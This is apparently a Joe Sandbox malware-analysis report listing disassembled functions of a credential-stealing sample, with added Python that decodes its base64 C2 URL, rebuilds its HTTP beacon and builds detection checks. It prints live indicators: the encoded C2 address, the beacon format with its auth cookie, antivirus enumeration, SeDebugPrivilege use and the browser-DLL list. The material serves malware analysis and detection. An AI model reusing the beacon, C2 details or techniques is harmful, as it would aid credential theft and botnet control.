• CoInitializeEx.COMBASE(00000000,00000000), ref: 00407B42
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00407B5B
• CoCreateInstance.OLE32(0040C35C,00000000,00000001,0040C28C,?), ref: 00407B7D
• SysAllocString.OLEAUT32(ROOT\SecurityCenter), ref: 00407BCA
• SysFreeString.OLEAUT32(00000000), ref: 00407BEC
• CoSetProxyBlanket.COMBASE(0040802B,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00407C04
• SysAllocString.OLEAUT32(WQL), ref: 00407C1A
• SysAllocString.OLEAUT32(SELECT * FROM AntiVirusProduct), ref: 00407C24
• SysFreeString.OLEAUT32(?), ref: 00407C42
• SysFreeString.OLEAUT32(00000000), ref: 00407C45
• wcscpy.MSVCRT ref: 00407C87
• VariantClear.OLEAUT32(?), ref: 00407C93
• wcscpy.MSVCRT ref: 00407CC8
• wcscpy.MSVCRT ref: 00407CDD
• CoUninitialize.COMBASE ref: 00407CFE
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: String$wcscpy$AllocFree$Initialize$BlanketClearCreateInstanceProxySecurityUninitializeVariant
• String ID: N/A$Not%20installed$ROOT\SecurityCenter$ROOT\SecurityCenter2$SELECT * FROM AntiVirusProduct$WQL$displayName
• API String ID: 2348074086-1641900438
• Opcode ID: eeaf18e7c5479f92f5b986c69bfef7b572b27737857ddda20f332f04ca5bdaac
• Instruction ID: 14b933085868c20b7664290315b8059269e27aae09e9c4c6532cf748e6fdc70d
• Opcode Fuzzy Hash: eeaf18e7c5479f92f5b986c69bfef7b572b27737857ddda20f332f04ca5bdaac
• Instruction Fuzzy Hash: A751A171A04214FFDB109BA1DC88DEF7F78EF85750F10456AF505BA290C738A941CBA9

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040292B
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040294E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(?,0000022C), ref: 0040296A
                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(00000000), ref: 004029D0
                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 00402A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402500: memset.MSVCRT ref: 00402523
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402500: memset.MSVCRT ref: 0040253B
                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 00402ADC
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(?), ref: 00402B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
• API ID: memset$Process32$AllocCreateFirstInfoLibraryLoadMemoryNextProcessReadSleepSnapshotSystemToolhelp32Virtual
• String ID:
• API String ID: 1240009946-0
• Opcode ID: 31cfed496c4abfdc5d5b63704949701fa088fd0f3775925ce9e096dbb5085ccf
• Instruction ID: a09e17c9bf84d5d5d582aa3874472580bb7c6ac93d6df4c66b660d1a04c0cb9a
• Opcode Fuzzy Hash: 31cfed496c4abfdc5d5b63704949701fa088fd0f3775925ce9e096dbb5085ccf
• Instruction Fuzzy Hash: 48519F71A00209ABDF11ABA9CD45BAE7BB4AF44704F10406AF005B62C1EF789A419B99
APIs
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,?,?,?,?,?,?,004055BE,?,?,00000000), ref: 00407510
• AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00407543
  • Part of subcall function 00401038: CloseHandle.KERNELBASE(?,?,0040754D,00000000), ref: 0040104C
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AdjustCloseHandleLibraryLoadLookupPrivilegePrivilegesTokenValue
• String ID: SeDebugPrivilege
• API String ID: 2554602356-2896544425
• Opcode ID: 01756253d6279bc06532bc359191b9fb583836657e85989d576cd599f160dac0
• Instruction ID: 6e7a77d222d5dae45ddfc479b8958933faf07da482d68d81a335310f6622e393
• Opcode Fuzzy Hash: 01756253d6279bc06532bc359191b9fb583836657e85989d576cd599f160dac0
• Instruction Fuzzy Hash: C901A176D00219BAEB24ABA5CC06FBF7B78DB84B14F10002EF611B61C0DEB45A42C7A4
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e0afde4e7ea80f25c680adb9b258e1b8e79db88d3a9e5cb29347fda3f797a3d9
• Instruction ID: 27da8c1ec72761822c282df4f746b889bebbbd9ed263afda7f066945e698630e
• Opcode Fuzzy Hash: e0afde4e7ea80f25c680adb9b258e1b8e79db88d3a9e5cb29347fda3f797a3d9
• Instruction Fuzzy Hash: 4301DB72200119BADF219F76EC84CAB3B9CDFC47A4B12403BF90ADA194DE34CA51C764

Control-flow Graph

Control-flow graph (image not recoverable): entry 406efb-406f06, then a 16-way switch at 406f0c (cases 406f13 through 406f7c, one per DLL name listed under String ID) in which every case reaches the LoadLibraryW call at 406f81-406f8b; from there the function either returns via 406f8d-406f8f or continues at 406f91-406fb8 into a loop at 406fbd-406fd8 that repeatedly calls 406eca, exiting at 406fde-406fe0.

APIs
• LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: LibraryLoad
• String ID: advapi32.dll$crypt32.dll$dnsapi.dll$kernel32.dll$msvcrt.dll$nspr4.dll$nss3.dll$ntdll.dll$ole32.dll$psapi.dll$shell32.dll$shlwapi.dll$user32.dll$wininet.dll$ws2_32.dll$xul.dll
• API String ID: 1029625771-4097605785
• Opcode ID: b05cdc3783718204fb3b4be6137daa9054297c803891c43341a82129f0edb6f1
• Instruction ID: f657154772c80f87e448980a5ca515e2e2bcc5c52bfdccd5b73551a91bb51776
• Opcode Fuzzy Hash: b05cdc3783718204fb3b4be6137daa9054297c803891c43341a82129f0edb6f1
• Instruction Fuzzy Hash: B5213434B48217EFCB10DF58E8D1A7973A4AA0470473243B7AC07B22C1DA7DA923965E

Control-flow Graph

APIs
  • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
  • Part of subcall function 00408248: DnsQuery_A.DNSAPI(00000000,00000001,00000100,00000000,00000000,00000000,?,?,0040833E,0040C698,00000000,00000104,00000000,00000000,00000000), ref: 0040826C
• DnsQuery_A.DNSAPI(?,00000001,00000048,00000001,?,00000000,00000000,00000000,00000000), ref: 00408383
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Query_$AllocVirtual
• String ID: 8.8.4.4$8.8.8.8$alors.deepdns.cryptostorm.net$anyone.dnsrec.meo.ws$civet.ziphaze.com$ist.fellig.org$ns.dotbit.me$ns1.any.dns.d0wn.biz$ns1.nl.dns.d0wn.biz$ns1.random.dns.d0wn.biz$ns1.sg.dns.d0wn.biz$ns2.fr.dns.d0wn.biz$ns2.random.dns.d0wn.biz$onyx.deepdns.cryptostorm.net
• API String ID: 1456340079-1306401760
• Opcode ID: 8ae600da997019b12e885ff345ab86a939921d59ce991e6e7073f847662ee345
• Instruction ID: c9084613bda45e1e74c3bb461d827bd270bf68cfc2f17d1f5d5ae0dfdf99d2f2
• Opcode Fuzzy Hash: 8ae600da997019b12e885ff345ab86a939921d59ce991e6e7073f847662ee345
• Instruction Fuzzy Hash: C831A0B5901209EFDB10DF95D985AEDBBB4EF84718F10853EE640BB2C0CBB94A458F58
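The SeDebugPrivilege entry and the DnsQuery_A entry above are the two function listings an analyst would act on first. What follows is an added triage example, not code from the Joe Sandbox report or from the analysed sample: it parses the report's "APIs" bullet lines and its "$"-joined "String ID" lists (copied below as constructed input, plus one memset line from the last entry on this page to exercise the argument-less form) and applies three checks: a direct LookupPrivilegeValueW("SeDebugPrivilege") followed by AdjustTokenPrivileges, decoding of the wType and Options values passed to DnsQuery_A against the dnsapi.h option bits, and whether the LoadLibraryW table includes the Mozilla runtime DLLs. The one assumption is that the first three stack values Joe Sandbox lists for DnsQuery_A correspond to pszName, wType and Options in prototype order.

```python
"""Added triage example for Joe Sandbox function entries (not report code).
Assumption: the first three listed stack values of DnsQuery_A are
pszName, wType and Options, in prototype order."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# One "APIs" line: optional bullet, optional "Part of subcall function X:",
# Func.Module(args), ref: address. The argument list is optional
# (e.g. "memset.MSVCRT ref: 00407D39").
API_LINE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# DnsQuery option bits from dnsapi.h that defeat local sinkholing.
DNS_QUERY_FLAGS = {0x8: "DNS_QUERY_BYPASS_CACHE",
                   0x40: "DNS_QUERY_NO_HOSTS_FILE",
                   0x100: "DNS_QUERY_WIRE_ONLY"}
MOZILLA_DLLS = {"nss3.dll", "nspr4.dll", "xul.dll"}  # Firefox runtime libraries

# Constructed input: lines copied verbatim from the report entries above.
PRIV_FUNC_APIS = """
• Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,?,?,?,?,?,?,004055BE,?,?,00000000), ref: 00407510
• AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00407543
• Part of subcall function 00401038: CloseHandle.KERNELBASE(?,?,0040754D,00000000), ref: 0040104C
"""
DNS_FUNC_APIS = """
• Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
• Part of subcall function 00408248: DnsQuery_A.DNSAPI(00000000,00000001,00000100,00000000,00000000,00000000,?,?,0040833E,0040C698,00000000,00000104,00000000,00000000,00000000), ref: 0040826C
• DnsQuery_A.DNSAPI(?,00000001,00000048,00000001,?,00000000,00000000,00000000,00000000), ref: 00408383
• memset.MSVCRT ref: 00407D39
"""
DNS_STRING_ID = ("8.8.4.4$8.8.8.8$alors.deepdns.cryptostorm.net$anyone.dnsrec.meo.ws$civet.ziphaze.com"
                 "$ist.fellig.org$ns.dotbit.me$ns1.any.dns.d0wn.biz$ns1.nl.dns.d0wn.biz"
                 "$ns1.random.dns.d0wn.biz$ns1.sg.dns.d0wn.biz$ns2.fr.dns.d0wn.biz"
                 "$ns2.random.dns.d0wn.biz$onyx.deepdns.cryptostorm.net")
LOADLIB_STRING_ID = ("advapi32.dll$crypt32.dll$dnsapi.dll$kernel32.dll$msvcrt.dll$nspr4.dll$nss3.dll"
                     "$ntdll.dll$ole32.dll$psapi.dll$shell32.dll$shlwapi.dll$user32.dll"
                     "$wininet.dll$ws2_32.dll$xul.dll")


@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int]  # callee address when reported as "Part of subcall function"


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue  # blank lines and headings such as "APIs" are skipped
        raw, sub = m.group("args"), m.group("sub")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("func"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def split_string_ids(string_id: str) -> list:
    return [s for s in string_id.split("$") if s]


def enables_debug_privilege(calls) -> bool:
    """The function itself looks up SeDebugPrivilege and then adjusts a token."""
    own = [c for c in calls if c.subcall_of is None]
    for i, c in enumerate(own):
        if c.func == "LookupPrivilegeValueW" and "SeDebugPrivilege" in c.args:
            return any(d.func == "AdjustTokenPrivileges" for d in own[i + 1:])
    return False


def _slot(args, i):
    """Hex stack value at index i; '?' (unresolved by the sandbox) becomes None."""
    return int(args[i], 16) if i < len(args) and args[i] != "?" else None


def decode_dns_queries(calls) -> list:
    """wType and Options of every DnsQuery_A call, with known option bits named."""
    out = []
    for c in calls:
        if c.func != "DnsQuery_A":
            continue
        wtype, opts = _slot(c.args, 1), _slot(c.args, 2)
        flags = [n for bit, n in DNS_QUERY_FLAGS.items() if opts is not None and opts & bit]
        out.append({"ref": c.ref, "wtype": wtype, "options": opts, "flags": flags})
    return out


def classify_resolvers(strings) -> dict:
    """Split the hard-coded resolver list into IP literals and hostnames."""
    ips, hosts = [], []
    for s in strings:
        try:
            ipaddress.ip_address(s)
            ips.append(s)
        except ValueError:
            hosts.append(s)
    return {"ips": ips, "hosts": hosts}


def mozilla_dlls_loaded(strings) -> set:
    return MOZILLA_DLLS & set(strings)


if __name__ == "__main__":
    print("SeDebugPrivilege enabled:", enables_debug_privilege(parse_api_lines(PRIV_FUNC_APIS)))
    for q in decode_dns_queries(parse_api_lines(DNS_FUNC_APIS)):
        print(f"DnsQuery_A @ {q['ref']:08X}: wType={q['wtype']} Options={q['options']:#x} {q['flags']}")
    print(classify_resolvers(split_string_ids(DNS_STRING_ID)))
    print("Mozilla DLLs:", sorted(mozilla_dlls_loaded(split_string_ids(LOADLIB_STRING_ID))))
```

Run against the copied lines, the direct DnsQuery_A call at 00408383 decodes to wType 1 (A record) with Options 0x48, i.e. DNS_QUERY_BYPASS_CACHE | DNS_QUERY_NO_HOSTS_FILE, and the subcall at 0040826C to Options 0x100 (DNS_QUERY_WIRE_ONLY); together with the list of public and third-party resolvers this means a hosts-file or cache-based sinkhole in the lab will not catch the lookups, so network-level interception is needed.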

Control-flow Graph

Control-flow graph (image not recoverable): CRT start-up at 402174-4021e9 (__p__commode, call 4022f3), __setusermatherr at 4021eb-4021f6, then _initterm / __getmainargs / _initterm at 4021f7-40224e, GetStartupInfoA at 402271-402282, GetModuleHandleA at 402298 followed by a call to 40557e, and exit / _XcptFilter at 4022a8-4022c5.

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
• String ID: @uvp]v
• API String ID: 801014965-873339645
• Opcode ID: b281988938781d67bf15387f0b1d5ee4fa9c5b3fd02b09e97799dea494b35ddc
• Instruction ID: f02d1b6466a299adb27a5e270f0a6a85593d2540db13fc2fa04fa029bfc30e9d
• Opcode Fuzzy Hash: b281988938781d67bf15387f0b1d5ee4fa9c5b3fd02b09e97799dea494b35ddc
• Instruction Fuzzy Hash: 544180B1801214EFDB209FE4DA8DAA97BB8FB09710F20467FE441B72D1C7B84941DB59

                                                                                                                                                                                                                                                                                            Control-flow Graph

APIs
• memset.MSVCRT ref: 00407D39
• memset.MSVCRT ref: 00407D50
  • Part of subcall function 004078D2: GetCurrentThread.KERNEL32 ref: 004078EF
  • Part of subcall function 004078D2: OpenThreadToken.ADVAPI32(00000000), ref: 004078F6
  • Part of subcall function 004078D2: GetLastError.KERNEL32 ref: 00407900
  • Part of subcall function 004078D2: GetCurrentProcess.KERNEL32(00000008,?), ref: 00407917
  • Part of subcall function 004078D2: OpenProcessToken.ADVAPI32(00000000), ref: 0040791E
  • Part of subcall function 004078D2: GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000,00000000), ref: 0040793A
  • Part of subcall function 004078D2: GetLastError.KERNEL32 ref: 00407940
  • Part of subcall function 004078D2: GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,?,?), ref: 00407967
  • Part of subcall function 004078D2: LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00407980
  • Part of subcall function 004078D2: CloseHandle.KERNELBASE(?), ref: 0040799A
• memset.MSVCRT ref: 00407D82
• memset.MSVCRT ref: 00407DC1
• wsprintfW.USER32 ref: 00407DED
  • Part of subcall function 004064D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
• strlen.MSVCRT ref: 00407E03
• memset.MSVCRT ref: 00407E28
• wsprintfW.USER32 ref: 00407E3C
• wcscpy.MSVCRT ref: 00407E4F
• wcscpy.MSVCRT ref: 00407E7B
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: memset$Token$CurrentErrorInformationLastOpenProcessThreadwcscpywsprintf$AccountByteCharCloseHandleLookupMultiWidestrlen
• String ID: %ls : %ls : %ls
• API String ID: 177936384-2957079723
• Opcode ID: babddac712cad19a0d7f26c6013cac7cc94ce63be575d8b99abbf3eab72173e6
• Instruction ID: 76b522d247ba1cef427f0a02b01398071b68e474c0fa3506349a2e9bce56e1da
• Opcode Fuzzy Hash: babddac712cad19a0d7f26c6013cac7cc94ce63be575d8b99abbf3eab72173e6
• Instruction Fuzzy Hash: 46410AB2D0111CAADB11ABA1CD89DEFB7BCAF48314F0041B7B505F2151EA389F548FA9

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,76EAA830,aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=,0040C8B0,?,?,?,?,?,?,00407F38,00000000,enter,00000000), ref: 00408D97
• GetProcAddress.KERNEL32(00000000,sprintf), ref: 00408DAE
• wcslen.MSVCRT ref: 00408E1A
• wcslen.MSVCRT ref: 00408E2D
Strings
• sprintf, xrefs: 00408DA8
• _wv=%ls, xrefs: 00408E3C
• aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=, xrefs: 00408D85
• POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 00408E5D
• ntdll.dll, xrefs: 00408D89
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: wcslen$AddressHandleModuleProc
• String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%ls$aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=$ntdll.dll$sprintf
• API String ID: 2336636556-2706753241
• Opcode ID: cc94d6b67bd7c634288db6eaa589f14044f8ad9a1c3efea9667d72259c3ff468
• Instruction ID: df0ed00883dc8d85c0ee36307988c8dba98f72120727b95dcb06ce5e2765d488
• Opcode Fuzzy Hash: cc94d6b67bd7c634288db6eaa589f14044f8ad9a1c3efea9667d72259c3ff468
• Instruction Fuzzy Hash: AF41CCB1D00218BEEF056BE1DD4AAAF7B78EF44714F10416FF900B61C1DB795A448BA8
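The strings the report lists for 00408D7E are enough to recover the beacon and to write a detection for it. The Python below is an added example, not code from the report or from the analysed sample: it base64-decodes the task URL the sample passes to this function, rebuilds the POST from the report's format string, and scans constructed HTTP requests for three hooks the format string exposes: the hard-coded auth cookie, the rv:39.0 versus Firefox/38.0 version mismatch (a genuine Firefox build advertises the same version in both places), and an HTTP/1.0 POST carrying a browser User-Agent. The CRLF line endings between headers are an assumption (the report rendering drops control characters), and the sample requests and the _wv value are constructed for the example.

```python
"""Added example, not from the Joe Sandbox report or the analysed sample:
decode the C2 URL used by function 00408D7E, rebuild its beacon, flag it."""
import base64
import re

# Strings exactly as the report lists them for 00408D7E.
C2_URL_B64 = "aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA="
BODY_FMT = "_wv=%ls"
AUTH_COOKIE = "auth=bc00595440e801f8a5d2a2ad13b9791b"

# Assumption: CRLF between headers; the report rendering drops control chars.
REQUEST_FMT = (
    "POST %s HTTP/1.0\r\n"
    "Host: %s\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) "
    "Gecko/20100101 Firefox/38.0\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b\r\n"
    "Content-length: %i\r\n"
    "\r\n"
    "%s"
)

UA_RE = re.compile(r"rv:(\d+)\.\d+\) Gecko/20100101 Firefox/(\d+)\.\d+")


def decode_c2_url(b64: str = C2_URL_B64) -> str:
    """Base64-decode the task URL the sample hands to 00408D7E."""
    return base64.b64decode(b64).decode("ascii")


def split_url(url: str) -> tuple[str, str]:
    """Return (host, path) for a plain http:// URL."""
    m = re.fullmatch(r"http://([^/]+)(/.*)", url)
    if not m:
        raise ValueError(f"unexpected URL shape: {url!r}")
    return m.group(1), m.group(2)


def build_beacon(wv_value: str, url: str = "") -> str:
    """Reconstruct the POST the sample would send for a given _wv value."""
    host, path = split_url(url or decode_c2_url())
    body = BODY_FMT.replace("%ls", wv_value)  # %ls is the wide-string arg
    return REQUEST_FMT % (path, host, len(body), body)


def beacon_indicators(request: str) -> list[str]:
    """List the reasons a raw HTTP request looks like this sample's beacon."""
    reasons = []
    headers = request.split("\r\n\r\n", 1)[0]
    request_line = headers.split("\r\n", 1)[0]
    if ("Cookie: " + AUTH_COOKIE) in headers:
        reasons.append("hard-coded auth cookie")
    m = UA_RE.search(headers)
    if m and m.group(1) != m.group(2):
        # Real Firefox advertises the same version in rv: and Firefox/.
        reasons.append(f"rv:{m.group(1)} vs Firefox/{m.group(2)} mismatch")
    if (request_line.startswith("POST ") and request_line.endswith(" HTTP/1.0")
            and "User-Agent: Mozilla/" in headers):
        reasons.append("HTTP/1.0 POST with a browser User-Agent")
    return reasons


# Constructed traffic for the example: one rebuilt beacon, one benign request.
SAMPLE_REQUESTS = {
    "beacon": build_beacon("1"),
    "benign": (
        "GET / HTTP/1.1\r\n"
        "Host: example.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) "
        "Gecko/20100101 Firefox/39.0\r\n"
        "\r\n"
    ),
}


def scan(requests: dict[str, str] = SAMPLE_REQUESTS) -> dict[str, list[str]]:
    """Run the indicator check over every request and keep the hits."""
    return {name: beacon_indicators(req) for name, req in requests.items()}


if __name__ == "__main__":
    print(decode_c2_url())
    for name, hits in scan().items():
        print(name, hits)
```

The cookie value is the most specific of the three hooks and is what a network signature should key on; the version mismatch and the HTTP/1.0 request line are weaker on their own and are best combined with the Host value of the decoded URL.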

Control-flow Graph (rendered as an interactive graph in the original report; legend: Executed / Not Executed)
Recoverable structure of 004078D2: 4078d2-4078fe GetCurrentThread, OpenThreadToken; on failure 407900-40790b GetLastError, then 407911-407926 GetCurrentProcess, OpenProcessToken; 407928-40793e GetTokenInformation (size query with a NULL buffer); 407940-407949 GetLastError; 40794b-407958 call 404c49; 40795a-40796b GetTokenInformation; 40796d-407988 LookupAccountSidW; all paths join at 407991 / 407992-407995; 407997-40799a CloseHandle; 4079a0-4079a2, then 4079a4-4079a5 call 404c38; exit 4079ab-4079b1.
APIs
• GetCurrentThread.KERNEL32 ref: 004078EF
• OpenThreadToken.ADVAPI32(00000000), ref: 004078F6
• GetLastError.KERNEL32 ref: 00407900
• GetCurrentProcess.KERNEL32(00000008,?), ref: 00407917
• OpenProcessToken.ADVAPI32(00000000), ref: 0040791E
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,00000000,00000000), ref: 0040793A
• GetLastError.KERNEL32 ref: 00407940
• GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,?,?), ref: 00407967
• LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 00407980
• CloseHandle.KERNELBASE(?), ref: 0040799A
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Token$CurrentErrorInformationLastOpenProcessThread$AccountCloseHandleLookup
• String ID:
• API String ID: 4175233327-0
• Opcode ID: 223df96bc05a8bfedb15175d6f92cefc4116d2cb6c70b561b553ae38f2bd0538
• Instruction ID: 609ed7c15d32b6034a4c8f4bf665a9d089410b99d4fc1c170885cd96a357999d
• Opcode Fuzzy Hash: 223df96bc05a8bfedb15175d6f92cefc4116d2cb6c70b561b553ae38f2bd0538
• Instruction Fuzzy Hash: 632128B1904109FBEF219FEADD84AAFBBB9FB44704F104166F600F2191D7399A40DB69

Control-flow Graph (rendered as an interactive graph in the original report; legend: Executed / Not Executed)
Recoverable structure of 004097B9: entry 4097b9-40998d call 404c49, wsprintfW, call 408d7e, call 404c38, memset x2, call 404c49, call 402b53, call 404b15 x2, call 40974a; a loop 4099aa-409b7a calling 402c47, 402c68, 4085b3, 402b0a, 408545, 402bdd, 404b15, 40627b and 408482, with a chain of branching blocks 409ab1-409b6c that converge on _beginthreadex at 409b14-409b1f; exit 409b8a-409ba1 call 404c38, _endthreadex.
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004098EA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408D7E: GetModuleHandleW.KERNEL32(ntdll.dll,76EAA830,aHR0cDovL24uZGRuc2dyYXRpcy5jb20uYnIvbi90YXNrcy5waHA=,0040C8B0,?,?,?,?,?,?,00407F38,00000000,enter,00000000), ref: 00408D97
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040991E
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00409935
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00409B94
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: memset.MSVCRT ref: 004085DF
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: RegOpenKeyExA.KERNELBASE(80000001,Software\Z0BAZwxx\,00000000,00000001,?,?,?,?,00000000), ref: 00408605
                                                                                                                                                                                                                                                                                              • Part of subcall function 004085B3: RegQueryValueExA.KERNELBASE(?,00000104,00000000,?,00000000,00000104,?,?,?,00000000), ref: 00408631
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408545: Sleep.KERNELBASE(0000000A,?,00000000,?,?,?,004099F4), ref: 00408572
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408545: RegSetValueExA.KERNELBASE(00000000,004099F4,00000000,00000001,0040D10C,00000000,?,?,004099F4), ref: 0040859D
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00409B16
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
